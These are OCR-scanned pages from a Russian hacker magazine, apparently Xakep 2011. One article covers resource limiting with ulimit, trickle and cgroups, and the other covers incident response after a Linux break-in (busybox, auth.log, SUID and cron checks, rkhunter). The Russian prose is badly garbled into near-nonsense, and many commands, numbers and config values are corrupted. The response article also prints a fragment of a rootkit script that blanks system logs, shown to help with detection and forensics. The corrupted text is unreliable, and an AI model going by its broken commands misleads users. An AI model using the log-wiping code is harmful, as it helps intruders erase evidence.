0

гооt

В В

В.В В.В

В : ВВ.ВВ netns В : ВБ . ВВ sync_supeгs

03 14 15 16

томище случае, если бы ни касательно дн по части другое п риложе ни ене не без; д е ла е т э так . Э т по отношению

061814Bk

Э гооt

0

сяк этому классу, п олуча т шанс работы не без; ди ском толь ко во

042624k used ,

U*IIMIIjM•)S.WII•4WMQI•il:llj-iljliMH 28 В 125m 09m 0312 S 14 0.8 048:11.16 npviewer.bln

047 гооt 18013 jlm 6444 j 0m 3148В j1m 31526 j1m 121513 гооt 12396 jlm 17834 j1m 31430 jlm 31516 jlm 1 гооt

0. ldle. Приложения, имеющие п риоритет ввода-вывода, отн осящий­

шении различных холодно т екущих, однако д ол г насчёт работающих проце ссов,

0952764k total ,

08034 jlm

приоритетына три класса:

самый от земли не видать разряд приоритетов, е го пригодно пустить в ход во отно­

load average: 0.27 , 0.11 . 0.08 8 stopped, б zoJТt>ie

Cpu(s): 0.0%us , З.?'Zsy, B.Bini , BS.S:~id , l.B'Xwa, B. B:Z.hi , B.B%si , B.B%st Hem : 20591BBk total, 0968876k used, 9HI24k: fгее, lllБBk buffers

cpuset

И сие близ том, почто ни одного флеw-баннера на брауэере малограмотный неприкрыто

которые могут п по части дожд а ть . В сие м для л ассе вкушать сумме одно з нач ение при оритета -0 .

0. Best effort. Класс пр иори т е тов, используемый для того всех процессов по умолча ни ю. Запросы ввода-вывода прил оже ний не без; рядом оритетом

Flle

Edlt

View Help

Resources

Conlrol Groups

сего класса обс л ужив ают ся по части очере д и, однако первыми получают

Proceuor Home

прав касательно получи и распишись работу ди ском п роцессы со ибо л ее ваша милость соким приорит е -

Groups

том, который-нибудь может обладать значе ни е через О поперед 0 00- непосредственно ый высокий приоритет, 0 - самый н изкий]. П ри этом учитывается т акже равным образом стан­ дартный приоритет, вслед д практически ны й командой пiсе, приближенно сколько прил ожения, запу щ енные со через «п iсе -п

09 Ыа-Ыа-Ыа>>,

буд ут последними

> ProcessorSМru

ffrкtiveProcessorAIIocatlon

Ssl'tarts

0S,.ormore

!!!а Memory

О Dlskl/0

~~

Network

в всехочере д ях всех планировщиков.

0. Real t ime. Приоритеты реального времени, п ри ло но ния не без; присутствие ори ­ т етом сего класса буд ут завсегда равно кайфовый всех ситуациях секс у чать д оступ ко диску п ервыми. Восемьдоступных уро вн ей приоритетое

I0 -7] тогда используются чтобы указания длит е л ьнос ти времени, отведе нн ого н а ввод-вывод. Е сли во системе лакомиться серия про­ цессов не без; таким приоритетом, они будут обс л ужива ть ся в области очере ди . За каж смрад с трех классов подле насчёт ри тетое закреплен ном е р:

0 - геаl

time, 0- best-effoгt, 0 - idle. Ч тоб ы запус тить использование со каким­ либо приоритетом ввода-вывода, сле задувает делегировать его равно м пишущий эти строки что

Vlrcu.IIM•chlnes

V Processor lnfo

ssrwes

SsuЬJroups;34processes

Processor lllt: Jntei(R)Corf(ТMJ2Duo

CPU L7SOO 0

0 .бOGHz

Procfsses lnthltsroup: • •

/uir/Ьinlmysqld_safe

lntei!R)Corf{ТMJ2Duo

CPU L7500 Hz

0

db.qUWf

postarн

• •

/uir/Ьinlpepool

Processor•2:

tusrlliЬtxec/mysqkl

.'""'

ora_disp~~lch

SO..ormorf ()

(10ShlfH}

AttuaiProcess.orusa&t: Avera&e 01.8'tlo (Ovfr 0М ,nst24 hours}

Hl&h

O'lto

Low

~

энтимема коман ды ioпice, указав штучка класса приоритетаи н омер приоритета во качестве опций. Нап ример:

016

nрототип графического интерфейса управления cgгoups на Fedoгa

ХАКЕР

01/154/2011


Победа во войне вслед средства

> ps aux

0 gгер npvieweг

j1m j1m

02303

0 . 0 0.0 9~92 9~8 pts/2 S+ 21 :55 0 :00 gгер npvieweг 15 .8 0.9 02820~ 00116 0 51 Sep0~ 0~7:33 /usг/liЬ/nspluginwгappeг/i386/li nux/npvieweг.bin --plugin /usг/lib32/mozilla/plugins/libflashplayeг.so --connection /огg/wгаррег/ 1803~

NSPlugins / libflashplayeг.so/18013-2/180~289383

>1

С через безыскусственный для оманды дозволительно выяснить, который npviewer. Ьin- сие Flash-плeep

В качестве домашне г насчёт каталога указываем принадлежащий самодельный ка т а­ лог. Пароль оставляем пус т ым.

ложений, так мож н относительно применить tгiсklе-демоном . Н ужно просто за п устить демон, указав нужные скорости:

0. Устанавливаемдля пользователядисковую квоту объемом 000 Г б:

$ trickled -d 028 -u 028

$ sudo apt-get $ su

iпstall

quota И после п ускай нужные приложения сейчас помимо указания скорост и:

# init 0 Открываем обложка /etc/fstab, находим раздел, содержа щишки й ка т алог

/ home, равным образом добавляем для нему опцию usгquota: /dev/sda7 / home ext4 defaults,usrquota

е

$ trickle wget ftp ~/ kernel .o rg/ Ьla-Ьla-Ыa $ trickle transmission $ trickle chromium Те п ерь вс е три приложения п олуча т пролив шириной 028 кб/с.

0

После сего перемонтируем раздел /home равным образом инициализируем

ГР У П П ИР У ЕМСЯ

аппарат управления квотами:

Все выш е рассмотренные методы, как например равно немножко извращенные, хоро­

# mount -о remount / home # quotacheck -cugm / home

телям Liпux, которые безвыгодный собираются во ближайшее срок трансформировать его в

ши тем, чт насчёт работают почти что на любом юниксе. Однако пользова­ что-то другое, ваш покорный слуга бы рекомендовал за воззриться во сторо н у cgгoups. Сопtгоl Gгoups- сие подсистема L i пu х-я дра , позволяющая объеди­

Запускаем следующую команду, с целью зада ть квоту поль зовате­ лю

quota_1 OOgb:

нять безграмотный почем процессов да их потомков на группы, ради каждой из которых могут находиться близкие ограничения н а д оступ для ресурсам

песнь ци об нн ой системы . Изначально п по части дсистема была разработана в целях

# ЕDПОR=любимы й_редактор edquota -u quota_1eegb

работы во связке не без; системой виртуализации уровня ОС, однако может составлять без каких -либо касательно гран иче ний использована да на правах один в край не воин механизм.

Откроется вычитчик со таблицей, похожей получай со д ержимое файла

У пр ав лени е подсистемой cgгoups происходит от файлы одно­

/etc/ fstab. В колонке haгd указываем размер квоты во килобайтах,

именной виртуальной файловой сис темы, да с целью туалет дозволено ис­

ради расчислить правильное значение, пользу кого сего дозволительно ис­

пользовать равным образом больше высокоуровневые инструменты , такие вроде черный

пользовать следующую неподвижность нд у !если слово по рукам относительно 000 Гб]: echo

cgcoп f ig, читающий обложка /etc/cgcoпfig.co п f п ри старте да автоматиче­

$( (100*1024*1024) ) .

ски соз д ающий г отовую ко использованию иерархию групп равно закре­

Сохраняем файл, выходим с однопользовательского режима:

пленных вслед ней ограничений, cgcгeate, д обавляющую новые группы, и

cgexec,

п озволяющую привя после ть безусловный ход ко т ой не так — не то

равно же й гр у пп е. Эти инструменты распространяются на составе батман кета

# init 0 # exit

сgгоuр -Ьi п, приближенно сколько е г в отношении должен побег т а н обвить во первую очередь.

0. Запускаем приложениесограничением:

монтирования, во качестве которой заурядно используется кадастр 0

Далее вместе с л е задувает включить файловую систему cgгoup ко точке

mпt/cgгoups:

$ sudo -u quota_1eegb transmission $ sudo mkdir / mnt / cgroups $ sudo mount -t cgroup nопе / mnt /cg roups

БЕЗДОННАЯ СЕТЬ Управлять пропускной из п особностью канала для того поодиночке взятых пр и­

Туда а подобает отвести виртуальные файловые системы

ложений дозволяется не без; через у тили твоя милость tгickle, коток орая, в духе да описанная

прежде бригада

cpul imit, п росто приостанавливает передач у данных

через приложен да аз многогрешный равно ко н ему во случае превышения указанного лимитчица !это

нужных п одсистем, ко т орые в духе единовременно равно отвечают из-за сужение

ресурсов . Всего таких подсистем сущес т вует девять:

делается от через подложной функции socket] . Утилита питаться на пакетах пользу кого любого дистрибутива, оттого установи ть

cgroups

Подсистемы

ее просто:

Ыkio

$ sudo apt-get install trickle

cpu - приостановление использования процессора; cpuacct - собирает статистику использования процессора; cpuset - привязывание процессов одной группы для конкретному;

Далее допускается запусти ть л юбое п риложе ни е от огран ич ением:

$ trickle -d 028 -u 028 \ wget

ftp ~// kerпel.org/Ьla-Ыa-Ыa

Здесь оп ц ия

'-d'

задает поспешность загрузки,

ядру

• • • ' - u'

- скорос ть

-

лимиты возьми пропускную талант ввода-вывода;

процессора;

devices f ceezer memory net_cls -

отдел доступом для устройствам; заморозка да разморозка процессов ~ ограничения получи и распишись использования оперативной памяти; помечает сетевые пакеты процессов

идентификатором класса

(classid)

интересах предстоящий

скачивания !оба во килобайтах во секун д у ! . Е сли вкушать п отребность на

настройки ограничения пропускной талантливость со через

выделении одинаковой шир ины канала не без; ра зу чтобы нескольких при-

подсистемы

ХАКЕР

01/154/2011

Traffic Control (tc);

017


UNIXOID ns -

руководство

пространствами

Но автор сих строк ограничимся тремя с них: Ыkio ,

net_cls тоже

Запустим tгansmissioп, привязав его для указанной группе:

имен.

cpu

равным образом memoгy. Подсистема

тельно по поводу необходимости шелковый настройки шейпинга вместе с помощью утилиты

tc,

$ cgexec -g Ыkio:me/transmission transmission

может оказываться полезна, однако пускать в ход ее затрудни­

в чем дело? безвыгодный лишь только до чертиков неудобно, же да не мудрствуя лукаво упрощенно нате

Также создадим отдельную группу интересах Flаsh-плагина, жрущего память равно процессор:

фоне существования простого во использовании шейпера tгickle.

Итак , с целью ввести подсистемы, нужно открываем обложка

cgcondig.conf

/etc/

$ cgcreate -g cpu,memory:me/npviewer

да добавляем на него следующие строки:

Ограничим его

$ sudo vi /etc/cgconfig.conf

00241

mount { cpu=/mnt/cgroups/cpu; memory=/mnt/cgroups/memory; Ыkio

000 Мб памяти равно 00% (доступные значения с 0 накануне

процессарного времени:

$ echo 088 > /mnt/cgroups/cpu/me/npviewer/cpu.shares $ echo 000м > \ /mnt/cgroups/memory/me/npviewer/memory.limit_in_bytes

=/mnt/cgroups/Ьlkio;

На настоящий единовременно добавим на группу поуже гегемонящий процесс: Закрываем обложка да nерезапускаем стервис

cgconfig: $ cgclassify -g memory,cpu:me/пpviewer \ " pidof npviewer.bin ·

$ sudo /etc/init.d/cgconfig Все, пока что во каталогах /mnt/cgгoups/cpu, /mnt/cgгoups/memoгy да

Чтобы далеко не знакомить безвыездно сии зубодробительные команды потом каж­

/mnt/cgгoups/Ыkio не запрещается созидать новые группы процессов, огра­

дой загрузки машины, их дозволительно зачислить на конфигурационный обложка

ничиваемых одноименной подсистемой.

/etc/cgconfi g.confi g:

Проблема всего во том, сколько для того заnиси сии каталоги доступны только пользователю гооt . Выйти с этой ситуации не грех создав новую группу на самого себя от через команды cgcгeate:

$ sudo cgcreate

$USER -g

Это директива создаст синопсис

cpu,memory,Ыkio:me

me

во каталогах

cpu,

memoгy равным образом

Ыkio, общепонятный ради заnиси равно чтения текущим пользователем.

# vi /etc/cgconfig.conf # Группа пользу кого пользователя group me { perm { # Кто может запускать лимитами? admin uid=UID_пользователя

В эту метагрупnу дозволяется поселить нужные процессы равно настро­

# Кто может дополнять процессы task { uid=UID_пользователя

ить ограничения, так вернее на каждого nриложения сотворить

собственную группу . Создадим, наnример, группу ради приложения tгansmission, которая полноте лимитировать его первое место ввода­

на группу?

вывода:

$ cgcreate -g

Ыkio:me/transmission

Изменим первородство (так называемый вес] ввода-вывода на этой групnы прежде минимума (возможные значения с 000 предварительно 0000]:

$ echo 000 > /mnt/cgroups/Ьlkio/me/transmission/bklio.weight

> ulimit -а (Ьlocks, -с) 0 core file size data seg size Ckbytes, -d) unlimited С-е) 00 scheduling priority file size CЫocks, -f) unlimited ( -i) 05058 pending signals max locked memory Ckbytes, -1) 00000 max memory size Ckbytes, -m) unlimited open files C-n) 0024 pipe size (512 bytes, -р) 0 POSIX message queues Cbytes, -q) 019200 real-time priority С-г) 05 stack size (kbytes, -s) 0192 cpu time (seconds, -t) unlimited (-u) 06058 max user processes (kbytes, -v) unlimited virtual memory (-х) unlimited file locks >1

# К каким подсистемам cpu { } memory { } Ыkio { }

привязана каста

группа?

group me/npviewer cpu { cpu.shares=188 ; memory { memory.limit_in_bytes

group

me/traпsmission

Ыkio

000м ;

{

{

Ыkio.weight=

088;

}

Все, останется токмо привязать процессы для нужной группе .

I:I§I:I•I!W Ограничивать приложения на ресурсах далеко не исключительно можно, да и нужно. Ограничения помогают разбить тормоза системы, по­ ставить нате поприще прожорливые программы, совершить всемирная сеть

быстрым ажно умереть и невыгодный встать минута работы

wget.

И однако сие от через про­

стых однострочных команд да конфигурационных файлов во пару строк. :Х:

С через

018

ulimit дозволительно править далеко не токмо лимитом получай мнема

ХАКЕР

01 / 054/2 011


UNIXOID

Евген Зобнин lexecЬit.rul

Зализываем раны ПОДРОБНОЕ HOW ТО О ТОМ, ЧТО СЛЕДУЕТ ДЕЛАТЬ СРАЗУ ПОСЛЕ ВЗЛОМА МАШИНЫ

брезгуют ничем: ни серверами,

-

ни домашними компами,

выбирай файловую

ни даже если роутерами. Любая

систему Ыrfs в качестве основной,

Никто с нас безграмотный застрахован от взлома. Кул-хацкеры отнюдь не

СРАЗУ ПОСЛЕ

При следующей

полной

камп [а он, понятно же, отнюдь не выключается сутками напролет). откры­

переустановке

ваешь браузер да замечаешь какие-то странные притормаживания ,

дистрибутива

возлюбленная безграмотный всего только

машина, подключенная ко

Сети, может конституция мишенью . Чтобы оградить себя, следует укреплять оборону от через

быстрее

ext4,

так да позволяет откатывать

файловую систему к предыдущим

состояниям.

ась? делать, если бы хакинг все­

таки произошел? Как найти виновника да подскрести систему

ото подсунутых им бэкдоров?

ХАКЕР

01/154/2011

которых нормально вовек неграмотный было равным образом оказываться безграмотный может. Чтобы узнать. во

нежели дело, твоя милость запускаешь дисплей яма почитай iptгaf/gkгellm да видишь небольшие, так постоянные прибыль трафика во сторону какого-то не­ знакомого

IP, согласен до этих пор равно со странного порта кажется 03477 alias пусть даже SSH.

В голове приёмом пробегает парадокс касательно взломе, ру ки начинают метаться по клавиатуре, да цели лажовый неграмотный пр еследую т. Это шаг ника, а отнюдь не осо ­ знан ны е действия. Чт насчёт ныне делать?

В первую кортеж со л е задувает выщипать сетный шн ур изо колтун п а [или отключить точку д оступа, разве равно отнюдь не т крат правда ется за WiFi) . Можно, ко­

брандмауэра равно надзирать за обновлениями софта, да и то

Ты возвращаешься домой, наливаешь себя чашку кофе, садишься после

нечно, отключить да отсутствует посредством графичный интерфейс иначе говоря неподвижность ндой Разрешенный гооt­

лоrин вследствие SSH или необновленный накануне FТР­ сервер- основные

вроде << ifcoпfig

ethO dowп », однако сие займет в большинстве случаев времени, ко т орое

воспрещается терять. Следует запомнить, зачем вплоть до выяснения всех све д ений о взломщике ни во коем случае грешно перезагружать машину другими словами

затягивать сетевые сер висы. Во-первых. вора годится выслеживать п по части

причины взлома

горячим следам, во-вторых, сам черт невыгодный знает, гораздо некто засунул бэкдор, во

*niх-систем .

стартовые скрипты либо — либо во бинарник сетевого сервиса. Далее нелишне заполучить наличными инструментами администри­ рования. Больше системе надеяться нельзя, любая ма л о-мальски

019


UNIXOID ПО ГОРЯЧИМ СЛЕДАМ

> less

lvar/log/outh . log Jul 09 02 :34 :50 localhмt sshdl238791: Fail ed

pesswoгd

for invelld user ts fr011

01Э . 095.б5.7б

por

t 07282 ssh2 Jul 09 02 :34 :58 locelhost sshdi21B771 : Pl\ll_unlx_sesslon(sshd :sesslon) : sesslon c losed for

us eг го

ot Jul 09 02 :5«1 : 09 \oce l host sshdl 052б61: rev eгse mopplng checklng geteddгinfo fог c:tel-78-157-22- 01!1 . coЫetel . com.lllk: (78 . 057 .22 .141 fe i led - POSS I ВlE B~Ef.H H Rffitf!T! Jul 09 02 :54 :21 loce l host sshdl 052ббl: Accepted posswoгd for root rгom 08. 057.22. 041 por t 04887 ss h2 Jul 09 02 :54:21 loco l host sshd[ 05 06БJ: Plllll...unlx_sesslon( sshd :sesslonJ: ses slon opened for user го

ot

Ьу

Jul 09 03 :15 :52 locothost sudo : r oot : ТТУ=рts /8 ; Pl-0=/root ; USER=root ; COI't'ЯНO=/usr /Ьin / p ept Jul 09 ВЭ : 05 :52 tocolhost sudo : poll_un i xlsudo :sesston J: sesslon opened for user r oot Ьу r ootculd=

&CIW'I

Jul 09 Jul 09

цессах, текущих сетевых соединениях !даже по прошествии выдергивания кабеля доктрина хорошенького понемножку некоторое эпоха поддерживать соединения откры­

тыми], открытых портах равно всем, что такое? наш брат потеряем задним числом перезагрузки, в файлы возьми карте памяти:

{uid=BJ

Jul 09 02 :59 : 05 locelho5 t sudo : гоо t : ПY=pts/8 ; PI-C=Iгoot ; USER=гoo t ; ~НO=/usr /Ыn/p ocmon -Syy Jul 09 02 :59 : 05 locelhost sudo : P<'ll_unix(sudo :sesslonJ : sesslon орепеd for user r oot Ьу r ootculd=

., .,

Первое, что такое? нужно сделать,- сие не утратить совершенно познания относительно про­

ВЭ : IБ : I В ВЭ : 05 : 0б

. ceЫetel . con . 01k

locelhos t pesswdt21Б77J : pм_uni~Cip&sswd : chllllthtolcJ : pм!IIIOI"'d ch&nged for root locelhost sshi:HЭ2398] : reverse мpplng checlctng get&ddr'lnfo for ctel-78- 057- 02- 04 [ 08 . 057 .22 . 04] folled

Та ко выглядит /va г/log/auth . log впоследствии входа объединение SSH соответственно сторонне го поль зователя

# # # # # # #

D=/ media/usbfl ash busybox ps > $D/ps.txt busybox net stat - tuw > $D/conn . txt busybox netstat - tuwl \ grep LISTEN > $D/listen. txt busybox who > $D/users.txt busybox lsmod > $D/modules.txt busybox mount > $D/mount . txt Теперь у нас глотать ряд файлов, которые хранят исходные данные

(!ll i f [ "$1"=="--cleaгlogs" J; then echo "[• JCleaгning Logs ... " echo "------------------------------------" #Cleaгs 02 Diffeгent Logs Ыanklog< 0 < i f [ -f $<1 J J; then echo echo "--[•JCleaгed $(1)" echo > $<11 i f [ -f $<1 J . 0 J ; then echo "--[•JCleaгed $<11 Backup" echo "" > $(1} . 0 fi fi Ыank

log

об текущем состоянии системы. В файле

подозрительных приложений, которых во системе взяться малограмотный должно.

Немногие кул-хацкеры обременяют себя какой-либо маскировкой своих процессов, почему на списке твоя милость можешь откопать названия известных руткитов либо — либо даже если команд подобно пс или например

cups,

хоть твоя милость сам по себе удалил его вновь время назад- вместе с внушительный

пользователя работает стервис !если сие безграмотный гооt], равным образом выкопать постоянно его файлы от через следующей команды:

J

-user

ЮЗЕР

Скорее только твоя милость увидишь исходники бэкдора иначе говоря бота равно некоторые люди

Ыanklog /vaг!log/httpd/access_log Ыanklog /vaг / log/httpd/access.log Ыanklog /vaг/log/httpd/eггoг _log Ыanklog / vaг/log/httpd /eггoг

Также во

вероятностью сие бэкдор. Тогда нужно посмотреть, справами какого

# busybox fi nd

Ыanklog /vaг/log/messages

telnet.

списке могут являться имена сервисов, несвойственных твоей системе,

/ vаг !log/last log

Ыanklog / vaг/log / syslog Ыanklog /vaг / log/syslog

ps.txt перечислены весь

активные процессы. Его нужно отзывчиво ознакомиться держи наука

жмыхи деятельности взломщика . Вполне возможно, почто на списке процессов твоя милость не выделяя частностей безграмотный увидишь нуль подозрительного, да сие

.log

вовсе неграмотный значит, что-нибудь хакер невыгодный оставил бэкдора, что его скрывает специфический узел ядра . Как его найти, твоя милость узнаешь во

Да ж е са м ы й бесхитростный Liпuх-руткит у м еет полоскать логи

следующем разделе.

В файле

conn.txt будут перечислены совершенно сетевые соединения . Здесь

должен впялиться во сторону nодозрительных IР-адресов удаленной полезная обслуживающая программа может фигурировать изменена: бэкдора, подсунутого хацкером, цессов,

ls может хоронить файлы ps- зачеркивать их изо списка про­

lsmod- невыгодный извлекать информацию по отношению подозрительных моду­

стороны да номеров портов. Вполне возможно, хакер использовал « активныЙ >> бэкдор, кой самоуправно подключается для машине злоумыш­

ленника, за того с целью дожидаться соединения . В любом случае,

лях. Нам нужны новые, умышленно «чистые >>, инструменты. Все они

перечень должен разобрать весть тщательно, может твоя милость

очищать на жете кете

найдешь IР-адрес подлеца??. Файл

busybox, его версию пользу кого своего дистрибутива не грех

listen.txt- сие роспись открытых

скачать используя другую машину !п одойдет смартфон, планшет,

портов . Твоя урок -узнать, что за обслуживание скрыт из-за тем иначе говоря иным но­

нетбук], нассать сверху фле ш ку равно установить:

мером, равно выяснить, является ли симпатия легальным !например, может быть открыт речные ворота 00, хотя wеЬ-сервера держи твоей машине отродясь никак не было]. Файл useгs . txt- роспись текущих пользователей. Здесь весь достоит

# dpkg -i busybox-*

присутствовать ясно: всякий поганый пользователь-твой враг, побольше детальную Или снарядить лично с исходников:

ан фи в отношении нем ты да я узнаем сверху следующем этапе разбирательства. Файл

modules.txt- меню загруженных модулей , смотрим, анализируем, га­ # # # #

даем, может ли оный другими словами какой-нибудь часть составлять загружен получи нашей машине .

wget http : //goo.gl/ TuWTE tar -xjf busybox- 0 .19.1.tar.bz2 cd busybox-1.19.1 make menuconfig

01

без затей выходим изо

Файл

mount.txt- примонтированные файловые системы, иные

взломщики используюттрюки из перемонтированием на подсовыва­

ния левых файлов, сокрытия своих действий иначе говоря подмены файлов.

конфигуратора

Этот изучение есть расчет утвердить объединение потенциал маленько позже, а неотложно самое минута ткнуть во передача тот или другой

# make # make i nsta l l

LiveCD равным образом

свалить машину !сбросить кнопкой, а безвыгодный от листок иначе команду геЬооt- в духе моя особа ранее говорил, скриптам инициализации/шатдауна до­

Также подойдет модифицирование из рот н овкой батман кета

busybox получи и распишись другую

верять нельзя].

машину со последующим копированием бинарника /Ьin/busybox !этот вариант ажно предпочтительнее, главное, так чтобы ОС равно процессорная

застывшая музыка машин совпадали]. Свежеустановленный busybox дол­

ЧТО ПРОИЗОШЛО? После перезагрузки равным образом входа во

LiveCD делаем следующее:

жен таить в себе «чистые » версии всех необходимых нам администра­

тивных утилит, но да ему грешно вверяться получай

000%:

отдельно извра­

щенные взломщики могут сфальcифицировать вот и все да установитель движение кетов, равно

утилиту

дозволительно разведать изо перед этим сохраненного файла mount.txt]:

wget, равным образом хоть ер, да сие поуже вовсе сюрреалистический случай,

равно симпатия маловероятен. Теперь не возбраняется ударить для исследованию.

020

0. Проверяем всегда файловые системы нашей механизмы !имена разделов

# e2fsck_jdev/sda{ 0,2,3,4}

ХАКЕР

01/154/2011


Зализываем раны

/etc/passwd [точнее, /mпt/etc/passwdl сверху объект nользователей с нулевым UID:

SSHERIFF

# busybox cat /etc/passwd

0

grep '. * :. *: е:'

Воттак не запрещается позволить гооt-логин всего только из доверенных хостов: Если нашлось больше одной записи, зна чит, кракер успел за­

# vi /etc/ssh/sshd_config

управлять дополнительного суперпользователя. Найди его внутренний

PermitRootLogin no Match Host 092.168.1.*,127.e.e.l PermitRootlogin yes

тех но странных файлов да подкаталогов. Часто, с намерением никак не палить­

синопсис [предпоследнее поле! да изучи содержание во поиска х все ся, взломщики далеко не трогают юзерские учетные еженедельник равным образом неграмотный меняют

шаг роли, а просто-напросто добавляют собственный треншальтер на обложка -/.ssh/authoгized_keys какого-либо пользователя. Стоит проконтролировать нынешний обложка в любимец

левых ключей [обычно в дальнейшем питаться только лишь одиночный явный ключ, кото­

0. Монтируем корневую файловую систему ко каталогу /mnt [опять же консультируемся со mount.txtl:

рый твоя милость самовластно тама добавил, либо файла безграмотный существует вовсе!. Еще сколько-нибудь любимых методов оставления бэкдора сверху скорую руку:

# mount /dev/sdaX /mnt

0.

UID-бит получи и распишись файлы, пересмотр бери которые делается от через пре­ словутого fiпd:

0. Таким а образом монтируем весь другие разделы на соответ­ ствии от mount.txt.

# busybox find

0. На любой происшествие копируем во /mnt/Ьin busybox не без; LiveCD [если, конеч­

Правда, тутовник надлежит знать, какие файлы могутиметь SUID-бит, а какие

но, для диске дьявол есть!:

0 \( -perm

-е2еее -о

-perm -е4еее \)

нет. Но зто совсем нечего делать выяснить, выйдя изо сhгооt-окружения, выполнив

ту но команду на отношении файлов

ер

#

/bin/busybox /mnt/bin/busybox

LiveCD да сравнив листинги. 2. Сетевой услуги xinetd, во который-нибудь хацкер был в состоянии прибросить свой собственный сервис. Следует пропускать равно разобрать

0. Делаем синопсис /mпt корневой файловой системой из через

начинка файлов каталога /etc/xiпetd.d, а равным образом обложка /etc/iпetd.

conf. Кстати, самопроизвольно случай наличия сего файла во системеуже относительно многом

chгoot:

говорит. Современные дистрибутивы читают его, же поуже давненько безграмотный

# chroot /mnt /bin/bash

используют.

0. Механизм подключаемы х модулей аутентификации РАМ . Взлом­ Теперь наша сестра оказываемся на своей системе, только вместе с умышленно «чисты­

ми >>

busybox равным образом ядром . Это значит, аюшки? никакие методы сокрытия фай­

щик был в состоянии подсудобить на систему собственный собственноличный устройство аутентифи­ кации,которыйпускаето пределенныхпользователейбезспроса.

вылавливание да какой-либо деятельности взломщика днесь отнюдь не работают. Что

Анализируем файлы каталога /etc/pam.d, обращаем напирать бери

уделывать дальше? Во-первых, пристало опробовать каталоги /гооt, особенный

третью колонку, вслед за тем перечислены имена задействованных модулей

домоделанный каталог, а опять же /tmp, /vaг/tmp равно /dev/shm в наука на­

аутентификации. Вбиваем каждое изо них во

личия странных файлов равным образом подкаталогов. Это могут оказываться исполняемые

в легальность. Но нелишне помнить, который вор могхакнуть да

файлы не без; именами системных утилит, единичные файлы исходников с расширением 'с' либо целые каталоги со исходниками. Все зто может

Google да проверяем

озагсенный узел .

0. Некоторые недальновидные огурцы умудряются переписывать близкие

остаться затем взломщика, буде дьявол безвыгодный успел, никак не хотел , либо оказал­

команды на вместе с гоп. Там, например, может бытийствовать бзкдор, открывающий

ся больно глуп, ради убрать следовать с лица . Обрати забота нате

отчетливый речные ворота для

скрытые файлы, начинающиеся вместе с точки, равно имена вроде« ______ >>,

портбудет закрыт, равным образом админ, полагающийся возьми сведения

по большей части злоумышленники пытаются закамуфлировать домашние файлы .

или — или

Далее долженствует пролистать совершенно файлы .bas h _ histoгy изо домашних каталогов активных пользователей , в полном смысле слова возможно, хацкер забыл

их стереть, равно твоя милость увидишь наличность вводимых им команд [вперемешку со своими, конечно!. Не лишним бросьте опробовать предмет файла

0 минуты каждые ше сть часов. В 09% случаев netstat

nmap, безвыгодный заметит нисколько необычного. Но полно пробежать

по мнению файла м каталогов /etc/cгon. •, а та ко но /vaг/spool/cгoп/cгontabs, и всестанет ясно.

0. СGI-скрипты. Не считанные разы взломщики помещаютзакладки никак не на приложе­ ния самой операционной системы, а во небо и земля сценарии, исполь­

зуемые wеЬ-сервером ради динамической генерации ответов. Обычно зто случается, рано или поздно хацкер ломаетсервер помощью просвет во одном с

> cd / raat uпame

&&

cat

. bash_histaгy

-~

apt-get update yum fгее -m cat /etc / •-release i fconfig pacman -Rdd zope-interface sudo pacman -Syy sudo apt

таких скриптов, хотя безвыгодный можетповыситьсвои компетенция на системе . Тогда ему не остается ни аза другого, в духе правитьскрипты wеЬ-сервера, по­

мещая во нихбзкдор [именно поэтому, кстати, со таких скриптое следует сниматьбитзаписи пользу кого всех пользователей, за исключением гootl. К сожалению, совершенно сии проверки ни для чему неграмотный присутствие ведут, если модифицированными оказались системные утилиты да сервисы.

wget suda apt i tude update apt-get install sniffles - alsa installs libsniffle , libsniffle-dev suda apt-get install gгub-pc --гeinstall

sudo

растаn

apt

w passwd

+wget http: // 0inux .duke . edu / pгajects / yum / dawnlaad / 0 . B/ yum-2. В . 0 . tar . gz tаг -xvzf yum-2 . В , 0 . tar . gz cd yum-2 .B.7 ./ canfiguгe

make

Иногда взломщики изменяют расширенные атрибуты измененных

файлов со целью выдать волчий паспорт их изменение. Чтобы возвернуть всё-таки получай свои места, хватит облечь плотью и кровью следующую команду:

скрипт-кидди не мудрствуя лукаво умиляют своей наивностью

ХАКЕР

ИЗМЕНЕНИЕ АТРИБУТОВ ФАЙЛОВ

01 /154/2011

# chattr -iacsuASDd {/,/usr,/usr/local}{/bin/,/sbin/}*

021


UNIXOID Взломщик может легко пересобрать

vsftpd вместе с бэкдором вну-

три, учредить его бери площадь оригинала, убрать вслед собою да

ровно уйти.

09% пользователей инда неграмотный заметят сего да будут

считать, в чем дело? вместе с их системами целое на nолном порядке. Для выявления подобных бэкдоров существуют специальные утилиты. Инстру­ мент гkhunteг- одна с лучших программ такого класса, возлюбленная

способна сыскать подавляющая известных типов руткитов, умеет ска нировать малограмотный токмо обычные приложения, хотя да модули ядра,

> last root raot jlm j 0m

pts/3 pts/2 tty1 tty1

0В .157. 02.14 78 . 057 . 02 .14

геЬооt

system boat

0.6.39-ARCH

j1m jlm

tty1 tty1

reboot

system boot

jlm

tty1 tty1

j lm reboot

совершенство ко всему возлюбленная проводит аудирование безопасности равным образом показывает

геЬооt

nотенциально уязвимые ко взлому сетевые сер висы. Использовать

reboot

ее просто, довольно учредить программа вместе с приложением (можешь смело устанавливать связь для интернету от LiveCD, сие безопасно!:

# apt-get install rkhunter

геЬооt геЬооt

reboot reboot reboot reboat reboot reboot reboot

Thu Jul 01 01 З9- 01:49 088:89) Thu Ju 0 01 01 07 gone - в соответствии с logout

0.6.39-ARCH

system sys tem system system system system system system

boot boot boat boot boot boot boot boot

0.6.39-ARCH 2, б. 09-ARCH 2.6.39-ARCH 2.6.39-ARCH 2.6.39-ARCH 2. Б. 09-ARCH 2. б. 09-ARCH 2. Б. 07-ARCH

system system system system

boot boot boot boot

0. б. 07-Aii!CH 2. Б. 07-ARCH 2. Б. 07-ARCH 2. Б. 07-ARCH

Тhu

Jul 01 08

Thu Thu Thu Thu Thu

Jul Jul Jul Jul Jul

В?

st i 01 logged in

01 0В 07 - 08:87 21 0В 07 - 03:27 21 08 03 - cгash 21 08 03 - 08:8З 21 0В 03 - 03:27

088:881 185 :281 188:841 188 :88 0 185:241

Thu Jul 01 07 09 - crash

(80:04)

Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu Thu

088:881 185 :281 188:881 188:111 188:211 188:881 188 :81 0 IBB: B2 0 IBB:221 184:111 188:431 18B:BBI IBB:811

Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul Jul

01 07 21 07 21 07 21 07 21 07 21 07 21 07 21 07 21 07 2112 21 02 21 02 21 02

